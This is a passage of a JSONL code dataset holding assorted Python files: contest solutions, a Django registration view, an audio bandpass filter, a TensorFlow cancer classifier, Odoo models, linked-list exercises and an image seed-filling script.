duration_seq.append(base_durations[idx])\n","repo_name":"fuzzklang/flimmering","sub_path":"score_files/scripts_and_data/A/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18056221329","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n = int(input())\n A = list(map(int, input().split()))\n\n res = 0\n for i in range(n):\n if A[A[i] - 1] == i + 1:\n res += 1\n\n print(res // 2)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03993/s198933393.py","file_name":"s198933393.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18370862559","text":"from collections import Counter\nN = int(input())\na = list(map(int, input().split()))\nl = Counter(a)\nall_xor = 0\nif N % 3 != 0:\n if l[0] != N:\n print(\"No\")\n exit()\n else:\n print(\"Yes\")\n exit()\nfor _l in l.keys():\n if l[_l] == N // 3:\n continue\n if _l == 0:\n if l[0] == N:\n print(\"Yes\")\n exit()\n if l[0] != N // 3 or len(l) != 2:\n print(\"No\")\n exit()\n if l[_l] == (2 * N) // 3 and l[0] == N // 3:\n print(\"Yes\")\n exit()\n else:\n print(\"No\")\n exit()\nfor i in range(N):\n all_xor = a[i] ^ all_xor\nif all_xor == 0:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02975/s972145812.py","file_name":"s972145812.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18222137839","text":"def main():\n k = int(input())\n a, b = map(int, input().split())\n f = [1 for i in range(a, b+1) if i%k == 0]\n if f:\n print(\"OK\")\n else:\n print(\"NG\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02693/s727568938.py","file_name":"s727568938.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71900047018","text":"from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic.base import TemplateView\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.core import mail\nfrom django.utils.html import strip_tags\nfrom .forms import CustomUserCreationForm\nfrom .tokens import account_activation_token\n\ndef register(request):\n if request.method == \"GET\":\n return render(\n request, \"users/register_form.html\",\n {\"form\": CustomUserCreationForm}\n )\n elif request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n activateEmail(request, user, form.cleaned_data.get('email'))\n return redirect(reverse(\"register_done\"))\n return render(\n request, \"users/register_form.html\",\n {\"form\": form}\n )\n\n\ndef activateEmail(request, user, to_email):\n mail_subject = 'Activate your Data Governance DB user account.'\n html_message = 
render_to_string('users/register_email.html', {\n 'user': user.username,\n 'domain': get_current_site(request).domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user),\n 'protocol': 'https' if request.is_secure() else 'http'\n })\n plain_message = strip_tags(html_message)\n from_email = 'Data Governance DB <{}>'.format(settings.EMAIL_FROM)\n to = user.email\n mail.send_mail(mail_subject, plain_message, from_email, [to], html_message=html_message)\n\n\nclass RegisterDone(TemplateView):\n template_name = \"users/register_done.html\"\n\n\ndef register_complete(request, uidb64, token):\n User = get_user_model()\n try:\n uid = force_str(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n return render(\n request, \"users/register_complete.html\", {\"validlink\": True}\n )\n else:\n return render(\n request, \"users/register_complete.html\", {\"validlink\": False}\n )\n","repo_name":"devinit/data-governance-db","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"644932554","text":"import wave\nimport numpy\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy.signal import filtfilt\n\n# open the audio file and extract some information\nspf = wave.open('test_voice_male.wav','rb')\n(nChannels, sampWidth, sampleRate, nFrames, compType, compName) = spf.getparams()\n\n# extract audio from wav file and normalize it to the range [-1, 1]\ninput_signal = spf.readframes(-1)\ninput_signal = numpy.frombuffer(input_signal, dtype=numpy.int16)\namp = 1.0\ninput_signal = amp * input_signal / max(abs(max(input_signal)),abs(min(input_signal)))\nspf.close()\n\n# create the filter\nN = 4\nnyq = 0.5 * sampleRate\nlow = 100 / nyq\nhigh = 500 / nyq\nb, a = signal.butter(N, [low, high], btype='band')\n\n# apply filter\noutput_signal = signal.filtfilt(b, a, input_signal)\n\n# create output file\nwav_out = wave.open(\"output.wav\", \"wb\")\nwav_out.setparams((nChannels, sampWidth, sampleRate, nFrames, compType, compName))\n\n# write to output file, rescaling the normalized float signal back to 16-bit PCM\nwav_out.writeframes((output_signal * 32767).astype(numpy.int16).tobytes())\nwav_out.close()\n\n# plot the signals; the time axis is in seconds (nFrames samples at sampleRate Hz)\nplt.figure(\"input\")\nt = numpy.linspace(0, nFrames/sampleRate, nFrames, endpoint = False)\nplt.plot(t, input_signal, label='Input')\nplt.figure(\"output\")\nplt.plot(t, output_signal, label='Output')\nplt.show()\n","repo_name":"Mickvdw/4WBB0-hearing_aid","sub_path":"test2_bandpass.py","file_name":"test2_bandpass.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"27176566648","text":"from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport numpy as np\n\n# Data for a cancer classification model based on gene expression\n# Cancer_1 -> 1 (cancer patient), 0 (normal)\nxy = np.loadtxt('D:/works_tf/test_tensorflow1.x/test_data/cancer_data.csv',delimiter=',', dtype=np.float32)\nx_data = xy[:, 0:-1]\ny_data = xy[:, -1:]\n\nprint(y_data)\n\n# Use the placeholder function so that values are fed in when the program runs\nX = tf.placeholder(tf.float32, shape=[None, 10]) # shape made up of 10 features\nY = tf.placeholder(tf.float32, shape=[None, 1]) # shape made up of a single result\n\n# There is no prior information for the initial values of W and b, so set them randomly\nW = tf.Variable(tf.random_normal([10, 1], mean=0.01, stddev=0.02), name='weight') # 10 inputs produce 1 output\nb = tf.Variable(tf.random_normal([1]))\n\n
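# e.g. a sigmoid output of 0.73 for a sample is classified as 1 (cancer) by the 0.5 cutoff used below\n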
# Apply logistic regression (tf.sigmoid() is the sigmoid function for producing values between 0 and 1)\nhypothesis = tf.sigmoid(tf.matmul(X, W) + b)\n\n# cost = tf.reduce_mean(tf.square(hypothesis - Y))\n# cost = tf.reduce_mean(-Y * tf.log(hypothesis ) + (1-Y) * tf.log(1-hypothesis ))\ncost = -tf.reduce_mean(Y * tf.log(hypothesis ) + (1 - Y) * tf.log(1 - hypothesis))\n\n# The learning_rate matters: start from 0.01 and tune from there.\ntrain = tf.train.GradientDescentOptimizer(learning_rate = 0.002).minimize(cost)\n\npredict = tf.cast(hypothesis > 0.5, dtype=tf.float32)\n\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predict, Y), dtype=tf.float32))\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n\nfor step in range(10001):\n cost_val, hy_val, _ = sess.run([cost, hypothesis, train], feed_dict={X: x_data, Y: y_data})\n # if step%1000 == 0:\n # print(step, \"COST : \", cost_val, \"hypothesis : \",hy_val)\n\n\nh, c, a = sess.run([hypothesis,predict, accuracy], feed_dict={X:x_data, Y:y_data})\n\n\n# print(\"\\nHypothesis : \",h, \"\\nCorrect(Y) :\", c, \"\\nAccuracy:\",a)\n\n\nfor index, value in enumerate(h):\n if index%100 == 0:\n print(\"INDEX : \",index , \"predicted value :\", value, \"cancer status : \",'normal' if c[index] == 0 else 'cancer patient', \"actual value : \",x_data[index], y_data[index])\n\nprint(\"Accuracy: %s\" % (round(a*100, 2)))\n\n\n\n","repo_name":"venuspink/test_tensorflow1.x","sub_path":"cancer_classification.py","file_name":"cancer_classification.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"17278488532","text":"import pathlib\nfrom src.repositories.actionBar.core import hasSupportCooldown\nfrom src.utils.image import loadFromRGBToGray\n\n\ncurrentPath = pathlib.Path(__file__).parent.resolve()\n\n\ndef test_should_return_False_when_has_no_support_cooldown():\n screenshotImage = loadFromRGBToGray(f'{currentPath}/withoutSupportCooldown.png')\n hasCooldown = hasSupportCooldown(screenshotImage)\n expectedHasSupportCooldown = False\n assert hasCooldown == expectedHasSupportCooldown\n\n\ndef test_should_return_True_when_has_support_cooldown():\n screenshotImage = loadFromRGBToGray(f'{currentPath}/withSupportCooldown.png')\n hasCooldown = hasSupportCooldown(screenshotImage)\n expectedHasSupportCooldown = True\n assert hasCooldown == expectedHasSupportCooldown\n","repo_name":"lucasmonstrox/PyTibia","sub_path":"tests/unit/repositories/actionBar/core/hasSupportCooldown/test_hasSupportCooldown.py","file_name":"test_hasSupportCooldown.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"90"} {"seq_id":"19470704027","text":"from odoo import api, fields, models\nfrom odoo.exceptions import ValidationError\n\n\n# #######Beneficent\nclass SpoBeneficent(models.Model):\n _name = 'spo.beneficent.info'\n\n #char\n name = fields.Char(string='Nombre')\n\nclass SpoAcademicProgram(models.Model):\n _name = 'spo.academic.program.info'\n # Char\n name = fields.Char(string='Nombre')\n #Integer\n spo_credits_saved = fields.Integer(string='Créditos Acumulados')\n spo_credits_saved_exeption = fields.Integer(string='Excepción')\n #Float\n @api.constrains('spo_average_saved','spo_average_saved_exception')\n def validationAverage(self):\n if self.spo_average_saved > 20 or self.spo_average_saved_exception > 20:raise ValidationError('El promedio no puede ser mayor a 20')\n elif 
self.spo_average_saved < 0 or self.spo_average_saved_exception < 0:raise ValidationError('El promedio no puede ser menor a 0')\n spo_average_saved = fields.Float(string='Promedio Ponderado Acumulado')\n spo_average_saved_exception = fields.Float(string='Excepción')\n #Many2many\n spo_university_ids = fields.Many2many('spo.university.info', string='Universidades')\n\nclass SpoAcademicProgramUniversity(models.Model):\n _name = 'spo.academic.program.uni.info'\n _rec_name='program'\n program = fields.Char(string='Programa')\n name = fields.Many2one(comodel_name='spo.academic.program.info', string='Programa')\n #Integer\n spo_credits_saved = fields.Integer(string='Parámetro (CA)')\n spo_credits_saved_exeption = fields.Integer(string='Parámetro (CA) Excepción')\n #Float\n @api.constrains('spo_average_saved','spo_average_saved_exception')\n def validationAverage(self):\n if self.spo_average_saved > 20 or self.spo_average_saved_exception > 20:raise ValidationError('El promedio no puede ser mayor a 20')\n elif self.spo_average_saved < 0 or self.spo_average_saved_exception < 0:raise ValidationError('El promedio no puede ser menor a 0')\n spo_average_saved = fields.Float(string='Parámetro (PPA)')\n spo_average_saved_exception = fields.Float(string='Parámetro (PPA) Excepción')\n\n #Many2many\n spo_university_id = fields.Many2one('spo.university.info', string='Universidad')\n\nclass SpoCareers(models.Model):\n _name = 'spo.careers.info'\n\n #Char\n name = fields.Char(string='Nombre')\n\n #Many2one\n spo_type_AP_id = fields.Many2one('spo.academic.program.info', string='Tipo')\n \n spo_type_career = fields.Selection([\n ('prim', 'Principal'),\n ('secu', 'Secundaria')\n ], string='Tipo de Carrera')\n\n spo_university_ids = fields.Many2many('spo.university.info', string='Universidades')\n \nclass SpoCareersMixed(models.Model):\n _name = 'spo.careers.mixed'\n _rec_name='display_name'\n spo_university_id = fields.Many2one('spo.university.info', string='Universidad')\n spo_academic_program_id = fields.Many2one('spo.academic.program.info', string='Programa Academico')\n spo_academic_program_uni_id = fields.Many2one('spo.academic.program.uni.info', string='Programa Académico')\n spo_principal_career_id = fields.Many2one('spo.careers.info', string='Carrera Primaria')\n spo_principal_career = fields.Char(string='Carrera Primaria')\n spo_second_career_id = fields.Many2one('spo.careers.info', string='Carrera Secundaria')\n spo_second_career = fields.Char(string='Carrera Secundaria')\n\n @api.depends('spo_principal_career','spo_second_career')\n def _getName(self):\n for rec in self:\n if rec.spo_principal_career and not rec.spo_second_career:rec.display_name = f'{rec.spo_principal_career} / Ninguna'\n elif not rec.spo_principal_career and rec.spo_second_career:rec.display_name = ''\n elif rec.spo_principal_career and rec.spo_second_career:rec.display_name = f'{rec.spo_principal_career} / {rec.spo_second_career}'\n else:rec.display_name = ''\n display_name = fields.Char(string='Carrera',compute='_getName')\n spo_total_credits = fields.Integer(string='Créditos Totales')\n spo_credits_semester = fields.Integer(string='Créditos por Semestre')\n spo_CCU = fields.Float(string='Costo del Crédito Universitario', related='spo_university_id.spo_CCU')\n spo_CM = fields.Float(string='Costo de Mensualidad',related='spo_university_id.spo_CM')\n\nclass SpoUniversity(models.Model):\n _name= 'spo.university.info'\n _rec_name = 'short_name'\n name = fields.Many2one('res.partner',string='Nombre')\n short_name = 
fields.Char(string='Nombre Corto')\n spo_email = fields.Char(string='Correo')\n\n def _spo_CGS_value(self):\n val1= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_CGS_value')])\n value = None\n if val1:\n for vals in val1:value = vals.value\n return value\n spo_CGS = fields.Float(string='Costo de Gestión en Soles', digits=(2, 2), default=_spo_CGS_value)\n\n def _spo_TD_value(self):\n val2= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_TD_value')])\n value = None\n if val2:\n for vals in val2:value = vals.value\n return value\n spo_TD = fields.Float(string='Tasa de Seguro de Desgravamen %', digits=(2, 3), default=_spo_TD_value)\n\n def _spo_TIA_value(self):\n val3= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_TIA_value')])\n value = None\n if val3:\n for vals in val3:value = vals.value\n return value\n spo_TIA = fields.Float(string='Tasa de Interes Anual %', digits=(2, 2),default=_spo_TIA_value)\n spo_CCU = fields.Float(string='Costo del Crédito Universitario')\n spo_CM = fields.Float(string='Costo de Mensualidad')\n# ############ credit opportunities\nclass SpoState1(models.Model):\n\n _name ='spo.state.1.info'\n\n name = fields.Char(string='Nombre del Estado')\n\nclass SpoState2(models.Model):\n\n _name ='spo.state.2.info'\n\n name = fields.Char(string='Nombre del Estado')\n \nclass SpoState3(models.Model):\n\n _name ='spo.state.3.info'\n\n name = fields.Char(string='Nombre del Estado')\n\nclass SpoState4(models.Model):\n\n _name ='spo.state.4.info'\n\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoState5(models.Model):\n\n _name ='spo.state.5.info'\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoState6(models.Model):\n\n _name ='spo.state.6.info'\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoRiskMotive(models.Model):\n _name='spo.risk.motive.info'\n\n name = fields.Char(string='Nombre del Motivo de Riesgo')\n\nclass SpoContractStates(models.Model):\n _name='spo.contract.states.info'\n\n name = fields.Char(string='Nombre')\n\n type_state = fields.Selection(selection=[('1', '1'), ('2', '2'),('3', '3'),('4', '4'),])\n\nclass SpoCreditsSemester(models.Model):\n _name='spo.credits.semester.info'\n\n _rec_name = 'value'\n \n academic_program_id = fields.Many2one(comodel_name='spo.academic.program.info', string='Programa Académico')\n\n second_career = fields.Boolean(string='Segunda Carrera')\n\n value = fields.Integer(string='Valor')\n \n description = fields.Char(string='Descripción de Semestre')\n \nclass SpoMissSemester(models.Model):\n _name='spo.miss.semester'\n\n _rec_name='number'\n\n number = fields.Integer(string='Numero de Semestre Faltante')\n\nclass SpoCuotas(models.Model):\n _name='spo.cuotas.info'\n\n name = fields.Integer(string='Valor')\n \n spo_Type_installment = fields.Selection(string='tipo de Cuota', selection=[('student', 'Estudiante'), ('graduate', 'Graduado')])\n \n spo_academic_program_id = fields.Many2one('spo.academic.program.info', string='Programa Academico')\n\n spo_miss_semester = fields.Many2one(comodel_name='spo.miss.semester',string='Semestres Pendientes')\n \n \nclass SpoSemesterInf(models.Model):\n _name = 'spo.semester.info'","repo_name":"GpozzoR/Sponosr-16","sub_path":"models/spo_info.py","file_name":"spo_info.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"40618555824","text":"# 
_*_coding:utf-8_*_\n'''\nMerge two sorted linked lists into one new sorted linked list and return it.\nThe new list is made by splicing together all the nodes of the two given lists.\n\nExample:\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n\n'''\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n We can define the merge of two linked lists recursively:\n if list l1 is empty, no merging is needed and the result is simply l2;\n if list l2 is empty, return l1 directly.\n When neither l1 nor l2 is empty, traverse them recursively:\n check which of l1 and l2 has the smaller head value, and recursively decide\n which node is appended to the result next. The recursion ends once one list is empty.\n :param l1:\n :param l2:\n :return:\n '''\n if l1 is None: # termination condition: recurse until the lists are empty\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val: # recursive call\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n \n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ''' \n A refinement of the method above, moving the comparison into the else branch;\n judging from the submission results it should be faster in both time and space.\n Either way, both methods run in O(n) time and O(n) space.\n \n Complexity analysis:\n Time complexity: O(n+m), where n and m are the lengths of the two lists. Every call\n removes the head node of l1 or l2 (until at least one list is empty), and\n mergeTwoLists recurses at most once per node, so the time depends on the\n length of the merged list, i.e. O(n+m).\n Space complexity: O(n+m), where n and m are the lengths of the two lists. Each\n recursive call of mergeTwoLists consumes stack space, and the stack size depends\n on the recursion depth; mergeTwoLists is called at most n+m times before the\n recursion ends, hence the space complexity is O(n+m).\n '''\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n else:\n if l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n def mergeTwoLists1(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n The simplest idea:\n collect the values into a new list and use the built-in sort() method....\n :param l1:\n :param l2:\n :return:\n '''\n results = []\n while l1:\n results.append(l1.val)\n l1 = l1.next\n while l2:\n results.append(l2.val)\n l2 = l2.next\n # This adds a call to the built-in sort() method, so I am not fond of this solution;\n # comparing l1.val with l2.val directly would avoid using sort() altogether\n results.sort()\n head = ListNode(0)\n dummy = head\n for i in results:\n dummy.next = ListNode(i)\n dummy = dummy.next\n return head.next\n\n def mergeTwoLists2(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n We can also implement the algorithm above iteratively: while neither l1 nor l2 is\n an empty list, check which of the two head values is smaller, append the node with\n the smaller value to the result, and once a node has been appended advance the\n corresponding list by one node.\n \n Complexity analysis:\n Time complexity: O(n+m), where n and m are the lengths of the two lists. In each\n loop iteration exactly one element of l1 or l2 is moved into the merged list,\n so the while loop runs at most n+m times; everything else is constant time,\n giving O(n+m) overall.\n Space complexity: O(1), we only need constant space for a few variables.\n '''\n # Create a dummy node as the head of the result list; it therefore never moves.\n # To append the merge of the two lists at the end of the result list, a move cursor\n # is needed that points at the last element of the result list.\n # Initially move points at the dummy node, then keeps advancing as the result list\n # grows, always pointing at the last element of the result list.\n dummy = ListNode(0)\n # a cursor marking the tail of the result list\n move = dummy\n # neither l1 nor l2 has been fully traversed\n while l1 and l2:\n # if the value in l1 is smaller\n if l1.val <= l2.val:\n # splice the head node of l1 onto the tail of the result list\n move.next = l1\n l1 = l1.next # advance l1 to the next node\n else:\n # splice the head node of l2 onto the tail of the result list\n move.next = l2\n l2 = l2.next # advance l2 to the next node\n # advance the tail pointer of the result list\n move = move.next\n # l1 or l2 is not yet exhausted; splice it onto the end of the result list\n move.next = l1 if l1 else l2\n # return the position after the dummy node\n return dummy.next\n
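\n\n# (Illustrative usage added by the editor; not part of the original repository.)\n# A minimal runnable sketch for the iterative variant: build the example lists\n# 1->2->4 and 1->3->4 from the docstring, merge them, and print the result.\ndef _demo_merge():\n def build(vals):\n head = ListNode(0)\n cur = head\n for v in vals:\n cur.next = ListNode(v)\n cur = cur.next\n return head.next\n merged = Solution().mergeTwoLists2(build([1, 2, 4]), build([1, 3, 4]))\n out = []\n while merged:\n out.append(str(merged.val))\n merged = merged.next\n print('->'.join(out)) # expected: 1->1->2->3->4->4\n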
","repo_name":"LeBron-Jian/BasicAlgorithmPractice","sub_path":"LeetCode_practice/LinkedList/0021_MergeTwoSortedLists.py","file_name":"0021_MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"zh","doc_type":"code","stars":12,"dataset":"github-code","pt":"90"} {"seq_id":"24083260394","text":"import time\nimport text_analytic_tools.text_analysis.co_occurrence as co_occurrence\nimport text_analytic_tools.common.text_corpus as text_corpus\nimport text_analytic_tools\nimport text_analytic_tools.utility as utility\n\nlogger = utility.getLogger('tCoIR')\n\ncurrent_domain = text_analytic_tools.CURRENT_DOMAIN\n\nregion_names = [\n 'AFRICA',\n 'ASIA',\n 'EUROPA',\n 'Germany (all)',\n 'NORTH AMERICA',\n 'OCEANIA',\n 'PartyOf5',\n 'SOUTH AMERICA',\n 'WTI:Arab',\n 'WTI:Asian',\n 'WTI:Commonwealth',\n 'WTI:Communist',\n 'WTI:Latin America',\n 'WTI:Multiple Parties',\n 'WTI:United States of America',\n 'WTI:Western Europe'\n]\n\ndef store_result(data, target_filename):\n try:\n data.to_excel(target_filename)\n except ValueError as ex:\n logger.error(ex)\n logger.info('Storing data as CSV (tab) instead')\n target_filename = target_filename[:-4] + 'tsv'\n data.to_csv(target_filename, sep='\\t')\n\ndef compute_source_files(source_files):\n for source_file, tag in source_files:\n method = 'HAL'\n corpus = text_corpus.SimplePreparedTextCorpus(source_file, lowercase=True)\n document_index = current_domain.compile_documents(corpus)\n for window_size in [5, 10, 20]:\n result_filename = 'CO_tCoIR_en_45-72.{}_{}_{}_{}.xlsx'.format(time.strftime(\"%Y%m%d_%H%M\"), method, window_size, tag)\n print('Result filename: {}'.format(result_filename))\n df = co_occurrence.compute(corpus, document_index, window_size=window_size, distance_metric=0, normalize='size', method=method)\n store_result(df, result_filename)\n\ndef compute_source_files_by_region_filter(source_files):\n\n for source_file, tag, region_name, closed_region in source_files:\n method = 'HAL'\n document_index = current_domain.get_region_document_index(source_file, region_name=region_name, closed_region=closed_region)\n filenames = document_index.filename.tolist()\n corpus = text_corpus.SimplePreparedTextCorpus(source_file, lowercase=True, itemfilter=filenames)\n document_index = current_domain.compile_documents(corpus)\n for window_size in [5]:\n tag = '{}_{}_{}'.format(tag, region_name.lower().replace(':','_').replace(' ', '_'), 'closed' if closed_region else 'open')\n result_filename = 'CO_tCoIR_en_45-72.{}_{}_{}_{}.xlsx'.format(time.strftime(\"%Y%m%d\"), method, window_size, tag)\n print('Result filename: {}'.format(result_filename))\n df = co_occurrence.compute(corpus, document_index, window_size=window_size, distance_metric=0, normalize='size', method=method)\n store_result(df, result_filename)\n\n# RUN FOR ENTIRE CORPUS\n\n# entire_corpus_source_files = [\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.tokenized.zip', 'lemma.ADJ.NOUN'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.N.O.U.N.tokenized.zip', 'lemma.NOUN'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.V.E.R.B.tokenized.zip', 'lemma.VERB')\n# ]\n# compute_source_files(entire_corpus_source_files)\n\n# RUN FOR SPECIFIC REGIONS:\n\nregion_source_files = [\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Communist', False),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Communist', True),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Western Europe', False),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Western Europe', 
{"seq_id":"16948237071","text":"from typing import List\n\n\nclass Solution:\n    def fairCandySwap(self, A: List[int], B: List[int]) -> List[int]:\n        sum_a = sum(A)\n        sum_b = sum(B)\n\n        for x in A:\n            # Complement\n            y = x + int((sum_b - sum_a)/ 2)\n            if y in B:\n                return [x, y]\n\n    def fairCandySwap2(self, A: List[int], B: List[int]) -> List[int]:\n        sum_a = sum(A)\n        sum_b = sum(B)\n        avg = int((sum_a + sum_b) / 2)\n\n        for i in range(len(A)):\n            for j in range(len(B)):\n                if sum_a - A[i] + B[j] == avg:\n                    return [A[i], B[j]]\n\n\nA = [1,1]; B = [2,2]\nA = [1,2]; B = [2,3]\nA = [2]; B = [1,3]\nA = [1, 2, 5]; B = [2, 4]\ns = Solution()\nprint(s.fairCandySwap(A,B))\nprint(s.fairCandySwap2(A,B))\n","repo_name":"iamsuman/algorithms","sub_path":"iv/Leetcode/easy/888_fair_candy_swap.py","file_name":"888_fair_candy_swap.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"}
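The first `fairCandySwap` above already relies on the complement identity: after swapping x (from A) against y (from B) both totals must be equal, so y = x + (sum(B) - sum(A)) / 2. Since `y in B` is a linear scan over a list, testing membership in a set turns the whole search into O(n + m). A standalone sketch (mine, not the record's code):

```python
from typing import List, Optional

def fair_candy_swap(A: List[int], B: List[int]) -> Optional[List[int]]:
    # sum(A) - x + y == sum(B) - y + x  =>  y = x + (sum(B) - sum(A)) // 2
    delta = (sum(B) - sum(A)) // 2
    b_set = set(B)  # O(1) membership tests instead of a list scan
    for x in A:
        if x + delta in b_set:
            return [x, x + delta]
    return None

assert fair_candy_swap([1, 2, 5], [2, 4]) == [5, 4]
```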
{"seq_id":"4562099866","text":"import cv2\r\nimport numpy as np\r\nfrom skimage import io, data\r\nimport matplotlib.pyplot as plt\r\n\r\nNEIGHBOR_HOODS_4 = True\r\nOFFSETS_4 = [[0, -1], [-1, 0], [0, 0], [1, 0], [0, 1]]\r\n\r\ndef reorganize(binary_img: np.array):\r\n    index_map = []\r\n    points = []\r\n    index = -1\r\n    rows, cols = binary_img.shape\r\n    for row in range(rows):\r\n        for col in range(cols):\r\n            var = binary_img[row][col]\r\n            if var < 0.5:\r\n                continue\r\n            if var in index_map:\r\n                index = index_map.index(var)\r\n                num = index + 1\r\n            else:\r\n                index = len(index_map)\r\n                num = index + 1\r\n                index_map.append(var)\r\n                points.append([])\r\n            binary_img[row][col] = num\r\n            points[index].append([row, col])\r\n    return binary_img, points\r\n\r\ndef recursive_seed(binary_img: np.array, seed_row, seed_col, offsets, num, max_num=100):\r\n    rows, cols = binary_img.shape\r\n    binary_img[seed_row][seed_col] = num\r\n    for offset in offsets:\r\n        neighbor_row = min(max(0, seed_row+offset[0]), rows-1)\r\n        neighbor_col = min(max(0, seed_col+offset[1]), cols-1)\r\n        var = binary_img[neighbor_row][neighbor_col]\r\n        if var < max_num:\r\n            continue\r\n        binary_img = recursive_seed(binary_img, neighbor_row, neighbor_col, offsets, num, max_num)\r\n    return binary_img\r\n\r\ndef Seed_Filling(binary_img, neighbor_hoods, max_num=100):\r\n    if neighbor_hoods == NEIGHBOR_HOODS_4:\r\n        offsets = OFFSETS_4\r\n    else:\r\n        raise ValueError\r\n\r\n    num = 1\r\n    rows, cols = binary_img.shape\r\n    for row in range(rows):\r\n        for col in range(cols):\r\n            var = binary_img[row][col]\r\n            if var <= max_num:\r\n                continue\r\n            binary_img = recursive_seed(binary_img, row, col, offsets, num, max_num=100)\r\n            num += 1\r\n    return binary_img\r\n\r\n# Build the test image first so it exists before Seed_Filling is called.\r\nbinary_img = np.zeros((4, 7), dtype=np.int16)\r\nindex = [[0, 2], [0, 5],\r\n         [1, 0], [1, 1], [1, 2], [1, 4], [1, 5], [1, 6],\r\n         [2, 2], [2, 5],\r\n         [3, 1], [3, 2], [3, 4], [3, 6]]\r\nfor i in index:\r\n    binary_img[i[0],i[1]] = np.int16(255)\r\nprint(binary_img)\r\n\r\nprint(\"Seed_Filling\")\r\nbinary_img = Seed_Filling(binary_img, NEIGHBOR_HOODS_4)\r\nbinary_img, points = reorganize(binary_img)\r\nprint(binary_img, points)\r\n\r\nimage = 